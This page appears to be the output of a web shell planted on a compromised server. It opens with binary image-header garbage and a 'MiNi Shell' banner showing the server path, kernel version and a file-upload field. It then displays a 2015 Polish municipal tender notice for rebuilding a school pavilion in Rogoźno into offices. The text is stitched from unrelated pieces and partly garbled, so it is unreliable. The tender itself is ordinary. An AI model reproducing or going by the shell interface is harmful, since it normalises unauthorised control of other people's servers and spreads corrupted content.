JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151021/280856-N-2015.html

<p class="kh_header"><b>Rogoźno: Przebudowa budynku pawilonu lekcyjnego przy ul. Kościuszki 41 w Rogoźnie na pomieszczenia biurowe dla usług socjalno-oświatowych</b><br>
<b>Numer ogłoszenia: 280856 - 2015; data zamieszczenia: 21.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogoźno , ul. Nowa 2, 64-610 Rogoźno, woj. wielkopolskie, tel. 67 26 84 400, faks 67 26 18 075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rogozno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku pawilonu lekcyjnego przy ul. Kościuszki 41 w Rogoźnie na pomieszczenia biurowe dla usług socjalno-oświatowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest przebudowa budynku pawilonu lekcyjnego na pomieszczenia biurowe dla usług socjalno-oświatowych, jednokondygnacyjnego, niepodpiwniczonego, przykrytego dachem płaskim jednospadowym.
Budynek pełni funkcję biurową. 
Budynek jest ocieplony i ogrzewany.Jest on wyposażony w media i instalacje.
Budynek stanowi konstrukcyjną całość.Jest obiektem o prostej, zwartej bryle, rzucie opartym na prostokącie.
Wymiary zewnętrzne budynku to 56,36 m na 9,28 m.
Wysokość obiektu wynosi 5,03 m mierzona od średniego poziomu terenu przy budynku.
Budynek posiada 1 kondygnację naziemną. 
Na elewacjach zaprojektowano okładzinę z tynku mineralnego cienkowarstwowego.
Otwory okienne i drzwiowe wyposażone zostaną w stolarkę drzwiową i okienną PCV w kolorystyce nawiązującej do naturalnego drewna. 
Budynek pełni funkcję biurową. 
PARAMETRY TECHNICZNE OBIEKTU
Powierzchnia zabudowy 408,93 m2
Powierzchnia użytkowa 320,17 m2
Kubatura 1.797,65 m3
ZESTAWIENIE POWIERZCHNI
Wiatrołap 4,78 m2 Płytki ceramiczne
Komunikacja 36,45 m2 Płytki ceramiczne
Pomieszczenie biurowe 16,67 m2 Płytki ceramiczne
Pomieszczenie biurowe 16,67 m2 Płytki ceramiczne
Pomieszczenie biurowe 16,67 m2 Płytki ceramiczne
Przedsionek 4,76 m2 Płytki ceramiczne
Pomieszczenie gospodarcze 0,58 m2 Płytki ceramiczne
Składnica akt 6,84 m2 Płytki ceramiczne
Komunikacja 6,54 m2 Płytki ceramiczne
WC męskie 8,61 m2 Płytki ceramiczne
Wiatrołap 6,52 m2 Płytki ceramiczne
WC damskie 8,21 m2 Płytki ceramiczne
Komunikacja 14,62 m2 Płytki ceramiczne
Pomieszczenie biurowe 14,23 m2 Płytki ceramiczne
Pomieszczenie biurowe 18,62 m2 Płytki ceramiczne
Komunikacja 13,54 m2 Płytki ceramiczne
Pomieszczenie biurowe 30,13 m2 Płytki ceramiczne
Serwer 0,77 m2 Płytki ceramiczne
Komunikacja 15,54 m2 Płytki ceramiczne
Pomieszczenie biurowe 10,55 m2 Płytki ceramiczne
Pomieszczenie biurowe 11,19 m2 Płytki ceramiczne
Pomieszczenie biurowe 19,56  m2 Płytki ceramiczne
Pomieszczenie biurowe 20,68 m2 Płytki ceramiczne
Pomieszczenie biurowe 6,57 m2 Płytki ceramiczne
Składnica akt 10,87 m Płytki ceramiczne
POWIERZCHNIA UŻYTKOWA 320,17 m2	
Konstrukcja budynku  tradycyjna murowana.
Posadowienie budynku  na ławach fundamentowych.
Przykrycie budynku  dach jednospadowy kryty papą.
Szczegółowy opis elementów konstrukcyjnych w części konstrukcyjnej projektu.
Fundamenty
Istniejące ławy fundamentowe żelbetowe.
Ściany zewnętrzne
Ściany zewnętrzne murowane z pustaków ceramicznych Porotherm grubości 38 cm.
Ściany wewnętrzne nośne
Ściany wewnętrzne nośne murowane z pustaków ceramicznych Porotherm grubości 25 cm.
Ściany wewnętrzne działowe
Ściany wewnętrzne działowe murowane z pustaków ceramicznych Porotherm grubości 12 cm.
Nadproża
Prefabrykowane typu L-19 i stalowe.
Podciągi  belki
Według opisu konstrukcji.
Słupy  trzpienie Według opisu konstrukcji.
Szachty, kominy
Murowane z cegły ceramicznej pełnej.
Stolarka okienna
Okna PCV, rozwieralno uchylne. Szyby zespolone, podwójnie szklone z odstępem pomiędzy szybami, uzupełnione o system rozszczelniający, umożliwiający infiltrację powietrza do pomieszczeń. Współczynnik przenikania ciepła U  1,50 W m2 K.
Stolarka drzwiowa
Drzwi zewnętrzne wejściowe: PCW istniejące, wyposażone w zamki z wkładką patentową.
Drzwi wewnętrzne: płycinowe, okleinowane, w ościeżnicach drewnianych, teleskopowych oraz PCW przeszklone na traktach komunikacyjnych.
Dach Jednospadowy o spadku 3 5°, konstrukcji drewnianej oraz żelbetowej, pokryty papą.Odwodnienie dachu Istniejące rynny stalowe ocynkowane montowane na elewacji z zachowaniem spadku 0,5%.
Izolacje termiczne Ściany zewnętrzne zabezpieczone styropianem grubości odpowiednio 10 cm.
Dach zaizolowany wełną mineralną grubości 20 cm.
Izolacje przeciwwilgociowe
Izolacja pozioma  folia paroszczelna oraz papa.
Izolacja pionowa ścian zewnętrznych 2xDysperbit
Wykończenie ścian wewnętrznych
Tynk cementowo wapienny grubości 15 mm.
W ramach  przebudowy planuje się wykonanie następujących robót:
wzniesienie ścian działowych grubości 12 cm wewnątrz budynku,
montaż wewnętrznej stolarki okiennej i drzwiowej,
nałożenie tynków wewnętrznych cementowo-wapiennych grubości 1,5 cm,
naniesienie wewnętrznych powłok malarskich na istniejące i projektowane ściany budynku,
demontaż istniejących instalacji ogrzewania i elektrycznej,
montaż instalacji ogrzewania,
montaż instalacji elektrycznej,
montaż instalacji sieci komputerowej.
Instalacja wodociągowa
Opis projektowanego rozwiązania
Przed rozpoczęciem prac należy zdemontować istniejącą instalację wraz z armaturą.
Instalacja zimnej wody zasilana jest z istniejącego przyłącza wodociągowego. 
Zapotrzebowanie wody dla obiektu kształtować się będzie na poziomie:
cele bytowo socjalne; przepływ chwilowy q = 0,76 dm3;
Przyłącze wprowadzone jest do budynku do pomieszczenia nr 11
Bezpośrednio ze wejściem przyłącza do budynku zamontować zestaw antyskażeniowy złożony z dwóch zaworów odcinających DN32, filtra siatkowego DN32 oraz zaworu antyskażeniowego typu EA DN32 zgodnie z częścią rysunkową. 
Zestaw wodomierzowy złożony z dwóch zaworów odcinających DN50 oraz wodomierza skrzydełkowego typu JS 4 DN20 zamontować w pomieszczeniu węzła cieplnego szkoły.
Przewody wodociągowe instalacji wewnętrznej będą zasilać armaturę czerpalną poszczególnych urządzeń obiektu.
Instalację wodociągową zasilającą przybory sanitarne wykonać z rur wielowarstwowych . Przewody prowadzić w posadzce i bruzdach ściennych. W miejscach przejść przez ściany i stropy nie umieszczać połączeń przewodów i armatury. Dla przyborów sanitarnych posiadających armaturę stojącą jak np. umywalki czy zlewozmywaki stosować wężyki elastyczne w oplocie stalowym do instalacji wodnych z atestem PZH o wytrzymałości minimum PN10. Przed każdym przyborem zamontować zawór odcinający. Połączenia przyścienne zaworów czerpalnych oraz baterii ściennych zakryć rozetkami przylegającymi do powierzchni ściany. 
Ciepła woda użytkowa przygotowywana będzie w pojemnościowych podgrzewaczach ciepłej wody użytkowej o pojemności 10 dm3. Podgrzewacze wyposażyć w grupę bezpieczeństwa z zaworem bezpieczeństwa o ciśnieniu otwarcia 6 bar, lejkiem, syfonem służącym do odprowadzenia nadmiaru wody z zaworu bezpieczeństwa, oraz zaworem regulującym przepływ. Lokalizację podgrzewaczy pokazano w części rysunkowej.
Materiał rurociągów
Instalację wykonać z rur wielowarstwowych. Całość robót wykonać zgodnie z Warunkami Technicznymi Wykonania i Odbioru Instalacji Wodociągowych COBRTI Instal zeszyt 7 oraz wymogami producenta rur. 
Izolacja przewodów Przewody wody ziemnej, ciepłej oraz cyrkulacji należy zabezpieczyć izolacją termiczną z pianki PE. Grubość izolacji dla przewodów wody zimnej 13 mm, dla przewodów wody ciepłej i cyrkulacji zgodnie z tabelą:
Instalacja kanalizacji sanitarnej Przed rozpoczęciem prac należy zdemontować istniejącą instalację wraz z armaturą.
Projektuje się odprowadzenie ścieków sanitarnych do istniejącego przyłącza kanalizacji sanitarnej.
Instalację zewnętrzną wykonać z rur PVC klasy S o jednolitej strukturze ścianki. Na kanale zamontować studnie rewizyjne prefabrykowane z kręgów betonowych lub tworzywowe z włazem w klasie C250. Kanały włączyć do istniejących studni zewnętrznej kanalizacji sanitarnej. Trasy kanałów pokazano na planie zagospodarowania terenu. 
Przewiduje się, że w budynku nie będą powstawać ścieki wymagające podczyszczania. 
Instalacja kanalizacji wewnętrzna wykonana będzie z rur PVC. Na pionach, przed przejściem do instalacji podposadzkowej, należy zainstalować czyszczaki.  Podejścia pod poszczególne przybory prowadzić ze spadkiem 2% w kierunku do pionu. Przewody prowadzone są prostopadle lub równolegle do przegród budowlanych. Każdy przybór sanitarny podłączony do instalacji kanalizacyjnej musi posiadać zamknięcie wodne. Syfony odpływowe można łączyć z instalacją kanalizacyjną za pomocą kolan redukcyjnych, złączek kolanowych. Przewody poziome kanalizacyjne należy mocować do konstrukcji budynku za pomocą uchwytów lub obejm. Poziomy kanalizacyjne o średnicy do 110mm włącznie mocować co 1,0m, a powyżej o110mm co 1,2m. Na przewodach pionowych stosować na każdej kondygnacji przynajmniej 1 mocowanie stałe zapewniające przenoszenie obciążeń rurociągów i 2 mocowania przesuwne duża wysokość kondygnacji. Mocowanie przesuwne powinno zabezpieczać rurociąg przed dociskiem.
Wszystkie przejścia przewodów kanalizacyjnych przez przegrody budowlane wykonać w rurach osłonowych uszczelnionych masą elastyczną. Przejścia przez przegrody wydzielenia pożarowego należy wykonać jako ogniochronne kołnierze ogniochronne dla rur palnych. Piony kanalizacji sanitarnej należy wyprowadzić ponad dach i zakończyć wywiewką kanalizacyjną.
Instalacja centralnego ogrzewania
Zapotrzebowanie ciepła
Zapotrzebowanie ciepła dla potrzeb budynku określono zgodnie z normą PN EN 12831. Obliczenia przeprowadzono przy następujących założeniach.
Strefa klimatyczna II
Temperatura obliczeniowa powietrza zewnętrznego:-18°C
Zapotrzebowanie ciepła 25,0 kW
Parametry pracy instalacji c.o.90 70 °C
Źródło ciepła Źródłem ciepła dla budynku węzeł ciepła znajdujący się w sąsiednim budynku szkoły. Układ pomiarowy zużycia ciepła zostanie zamontowany w pomieszczeniu węzła cieplnego. Przewiduje się budowę nowego przyłącza cieplnego. Przyłącze cieplne oraz układ pomiarowy w zakresie MEGAWAT Rogoźno.
Instalacja wentylacji mechanicznej i klimatyzacji W łazienkach oraz pomieszczeniu socjalnym projektuje się wentylatory łazienkowe z opóźnieniem czasowym sterowanym włącznikiem światła. W pomieszczeniu serwerowni projektuje się klimatyzator. Skropliny z klimatyzatora odprowadzić do kanalizacji sanitarnej. Lokalizację urządzeń przedstawiono w części rysunkowej.
INSTALACJE ELEKTRYCZNE
Zakres rzeczowy rozdzielnica instalacja oświetlenia ogólnego i awaryjnego
instalacja siłowa instalacja odgromowa instalacja połączeń wyrównawczych
instalacja przeciwporażeniowa Przebudowywany budynek pawilonu lekcyjnego zasilany jest istniejącym kablem wyprowadzonym z istniejącego złącza kablowo pomiarowego. Istniejący układ zasilania zapewnia pokrycie projektowanej mocy.
Rozdzielnica:
Dla zasilania obiektu przewidziano rozdzielnicę RG w istniejącej szafce. W rozdzielnicy usytuowany zostanie  pomiar zużycia energii za pomocą istniejącego licznika. W rozdzielnicy zastosowano wyłącznik p.poż., który umożliwia wyłączenie napięcia przyciskiem usytuowanym na zewnątrz budynku. W związku z tym wyłącznik należy wyposażyć w wyzwalacz wzrostowy napięciowy. W rozdzielnicy przewidziano ochronę przepięciową.
Instalacja oświetlenia
Instalacja oświetlenia ogólnego wykonana zostanie oprawami świetlówkowymi.
Natężenie oświetlenia zostanie dobrane zgodnie z wymaganiami  normy PN EN 12464 1 Oświetlenie miejsc pracy oraz normy PN EN 1838 Oświetlenie awaryjne.	
Instalacja oświetlenia wykonana zostanie przewodami typu YDYp1,5 mm2.
W budynku instalację wykonać należy jako p.t. i n.t.W sanitariatach i pomieszczeniach przemysłowych stosować osprzęt hermetyczny o stopniu ochrony  IP44. W całym obiekcie zastosowano oświetlenie awaryjne i ewakuacyjne kierunkowe. Oprawy oświetlenia awaryjnego wyposażone zostaną w inwertery 1h. Oprawy wyposażone w moduły awaryjne muszą posiadać atest wydany przez CNBOP w Józefowie. Układanie przewodów skoordynować z układaniem innych instalacji.	Przejścia instalacyjne przez przegrody oddzielenia przeciwpożarowego o klasie REI 60  uszczelnić do odpowiedniej klasy z zastosowaniem systemów.Instalację oświetleniową  pokazano na rys.E 01.Wykaz opraw podany na rys.E 01. Instalacja  siłowa Instalacja  siłowa i gniazd  wtyczkowych  wykonana  zostanie  przewodami  typu YDYp, YDY i YKY. Instalacja siłowa w budynkach wykonana  zostanie  jako  p.t. 
Instalacja  siłowa i gniazd wtyczkowych wykonana zostanie przewodami 3 i 5 żyłowymi o przekrojach dostosowanych do mocy i zabezpieczeń odbiorników.Dla  klimatyzatora na dachu zastosowano wyłącznik serwisowy SB usytuowany  przy  urządzeniu. Układanie przewodów skoordynować z układaniem innych instalacji. Przejścia instalacyjne  przez  przegrody  oddzielenia  przeciwpożarowego o klasie REI 60 uszczelnić do odpowiedniej klasy z zastosowaniem systemów.				
Instalacja odgromowa
Zwody na dachu wykonane zostaną drutem Fe Zn fi=8mm.
Przewody odprowadzające wykonać bednarką Fe Zn 30x4 mm prowadzonym pod  elewacją zewnętrzną budynku.	
Złącza kontrolne umieścić p.t. w puszce.Uziom dla budynku przewiduje się  wykorzystać istniejący uziom otokowy. 	
Do uziomu podłączone będą przewody odprowadzające instalacji odgromowej, jak   również szyny połączeń wyrównawczych.
Dla ochrony klimatyzatora zastosować należy zwód pionowy izolowany.
Wszystkie części metalowe wychodzące ponad płaszczyznę dachu należy przyłączyć  do instalacji odgromowej.	 
Instalacja połączeń wyrównawczych W rozdzielnicy zamontować główną szynę  uziemiającą. Szynę tę połączyć przewodem  LY 1x25 mm2 z uziomem instalacji  odgromowej budynku. Do magistrali połączeń wyrównawczych przyłączyć należy 
zaciski PE  w rozdzielnicach, metalowe rurociągi wody, kanalizacji, c.o. i wentylacji, drabinki kablowe itp.Połączenia rur z magistralą wykonać przez spawanie lub przy  pomocy obejmy.Przewody wyrównawcze oznaczyć kolorem żółto zielonym.		Miejsca połączeń zabezpieczyć przed korozją przez dwukrotne pokrycie	lakierem asfaltowym. 					
Do głównej szyny uziemiającej przyłączyć należy miejscowe szyny połączeń  wyrównawczych usytuowane w sanitariatach.Do szyn tych przyłączyć należy  przewodem LY 4 mm2 wszystkie elementy metalowe.Połączenia miejscowych szyn  wyrównawczych z główną szyną uziemiającą wykonać przewodem typu LY 16 mm2. Do instalacji odgromowej przyłączyć wszystkie konstrukcje stalowe budynku,jak słupy stalowe itp.
Instalacja przeciwporażeniowa.						
Zgodnie z normą PN HD60364 jako ochronę przed dotykiem pośrednim  		zastosowano samoczynne wyłączenie.
Szybkie wyłączenie zrealizowano przez zastosowanie wyłączników instalacyjnych  i  bezpieczników.Jako dodatkową ochronę zastosowano wyłączniki  różnicowoprądowe. Przewód N należy trwale oznaczyć kolorem niebieskim lub zastosować przewody o  izolacji w tym kolorze.
Przewody ochronne PE wyprowadzone z szyn PE rozdzielnic przyłączyć należy do  instalacji odgromowej.Z szynami PE połączyć obudowę metalową  rozdzielnicy.Przewody PE z poszczególnych obwodów wyprowadzonych z  rozdzielnicy należy podłączyć do części przewodzących urządzeń elektrycznych odbiorczych tj.  takich ,które w przypadku uszkodzenia izolacji mogą znaleźć się pod napięciem, a także do zacisków ochronnych gniazd wtyczkowych.  
Przewody PE oznaczyć kolorem żółto-zielonym.W miejscach narażonych na  uszkodzenia mechaniczne przewód ochronny i przewody robocze osłonić rurką  PCV.	
INSTALACJE TELETECHNICZNE
W ramach projektowanej przebudowy zakłada się urządzenie wewnętrznej sieci  
teletechnicznej. Wszystkie elementy sieci należy wykonać w kategorii 6.
Połączenia kablowe
Połączenia kablowe w analizowanej sieci należy wykonać kablem miedzianym kategorii 6 UTP.Przewody należy prowadzić w karbowanych rurach elektroinstalacyjnych średnicy 14 9 50 43 mm w bruzdach podposadzkowych i ściennych.
Należy pozostawić zapas montażowy kabla w pomieszczeniu serwera ponad posadzkę 2 m oraz 0,20 m przy gniazdach abonenckich.
Należy zastosować gniazda abonenckie podtynkowe RJ45 kategorii 6.
Wyposażenie pomieszczenia serwera.
Projektuje się wyposażenie budynku w nową szafę dystrybucyjną 19 stojącą 22U o wymiarach 600x600 mm. Szafa zostanie uzupełniona następującym wyposażeniem:
panel 19 1U 48xRJ45 kategorii 6,przełącznik 19 1U 48xRJ45 10 100 1000 mbit, 2xport mini-GBIC,listwa zasilająca 19,czujnik temperatury 19,organizer kabli 19 1U czarny pionowy,kable krosowe RJ45 kategorii 6 długości 0,50 m.
Zakłada się, że urządzenie serwera zostanie przeniesione z istniejącej sieci teletechnicznej Gminnego Ośrodka Pomocy Społecznej.
Parametry techniczne przełącznika 
W szafie dystrybucyjnej należy zamontować przełącznik o następujących parametrach:
liczba portów RJ45 48 szt.liczba gniazd mini-GBIC 2 szt.zarządzanie  przez przeglądarkę www,protokoły uwierzytelniania i kontroli dostępu  MD5, RADIUS,obsługiwane  protokoły i standardy  QoS, IEEE 802.1p, DSCP, IEEE 802.1Q, IEEE 802.1x, Jumbo frame support, auto MDI MDI X, DHCP Client, IEEE 802.3ad, IEEE 802.1D, IGMP v.1, 2,
rozmiar tablicy adresów MAC 8000,algorytm przełączania  Store and Forward, prędkość magistrali wewnętrznej 96Gb s,przepustowość 71,42 mpps,warstwa przełączania 2,typ obudowy 1U Rack,zestaw do montażu w szafie rack 19,port mirroring..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.20.00.00-9, 45.40.00.00-1, 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.33.20.00-3, 45.33.23.00-6, 45.33.24.00-7, 45.33.11.00-7, 45.33.12.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 5 000,- zł (słownie: pięć tysięcy zł.00/100) w formach przewidzianych w ustawie z dni 29 stycznia 2004 r. Prawo Zamówień Publicznych art. 45.
Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Gminy Rogoźno, ul. Nowa 2,64-610 Rogoźno  

Bank: BS Czarnków, o/Rogoźno,
Nr konta 56 8951 0009 3900 0114 2000 0020</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji 
      działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
      do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed 
      upływem terminu składania ofert,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty wykazu tożsamych robót budowlanych wykonanych w okresie ostatnich 5 lat, a jeżeli okres 
     prowadzenia działalności jest krótszy - w tym okresie  z podaniem ich wartości, przedmiotu, dat 
     wykonania i odbiorców wraz z załączeniem dokumentu    potwierdzającego, ze roboty te zostały 
     wykonane w sposób należyty minimum 3 robót o minimalnej wartości 220 000,-- zł brutto  
     każda    - wg. załącznika nr 4 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty wykazu sprzętu technicznego i narzędzi niezbędnych do wykonania zamówienia, którymi  
      dysponuje/będzie dysponował Wykonawca - wg. załącznika nr 5 do SIWZ.  Zamawiający uzna 
      ten warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje /będzie dysponować 
      następującym sprzętem:
- min 1 samochód dostawczy 0,9 t
- min 1 wyciąg jednomasztowy z napędem elektrycznym 0,5 t ,
- min 1 agregat tynkarski 1,1-3 m3/h,
- min 1 samochód samowyładowczy 5 t,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia wykazu osób, które będą uczestniczyć w wykonaniu zamówienia w szczególności 
      odpowiedzialnych za świadczenie robót, pełniących funkcje kierowników robót,
      wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnego 
      do wykonania  zamówienia, a także zakresu wykonywanych przez nie czynności 
      oraz informacją o podstawie do dysponowania tymi  osobami zał. nr 6 do SIWZ,
             - 1 osoba o specjalności w branży elektrycznej,
             - 1 osoba o specjalności w branży wod.-kan.,c.o.,
             - 1 osoba  o specjalności w branży budowlanej,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
